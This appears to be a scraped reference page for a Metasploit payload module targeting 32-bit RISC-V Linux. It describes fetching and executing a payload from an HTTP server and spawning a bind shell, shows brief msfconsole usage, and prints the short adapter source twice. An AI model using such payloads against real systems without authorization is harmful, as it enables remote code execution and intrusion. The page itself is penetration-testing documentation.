Description
Fetch and execute an RISC-V 32-bit payload from an HTTP server. Listen for a connection and spawn a command shell Module Options msf use payload/cmd/linux/http/riscv32le/shellbindtcp msf payloadshellbindtcp show actions ...actions... msf...
Basic Information
ID
MSF:PAYLOAD-CMD-LINUX-HTTP-RISCV32LE-SHELL_BIND_TCP-
Published
Jan 5, 2026 at 18:59
Affected Product
Affected Versions
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
module MetasploitModule
include Msf::Payload::Adapter::Fetch::HTTP
include Msf::Payload::Adapter::Fetch::LinuxOptions
def initialize(info = {})
super(
update_info(
info,
'Name' => 'HTTP Fetch',
'Description' => 'Fetch and execute an RISC-V 32-bit payload from an HTTP server.',
'Author' => ['Brendan Watters', 'Spencer McIntyre', 'bcoles'],
'Platform' => 'linux',
'Arch' => ARCH_CMD,
'License' => MSF_LICENSE,
'AdaptedArch' => ARCH_RISCV32LE,
'AdaptedPlatform' => 'linux'
)
)
end
end
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
module MetasploitModule
include Msf::Payload::Adapter::Fetch::HTTP
include Msf::Payload::Adapter::Fetch::LinuxOptions
def initialize(info = {})
super(
update_info(
info,
'Name' => 'HTTP Fetch',
'Description' => 'Fetch and execute an RISC-V 32-bit payload from an HTTP server.',
'Author' => ['Brendan Watters', 'Spencer McIntyre', 'bcoles'],
'Platform' => 'linux',
'Arch' => ARCH_CMD,
'License' => MSF_LICENSE,
'AdaptedArch' => ARCH_RISCV32LE,
'AdaptedPlatform' => 'linux'
)
)
end
end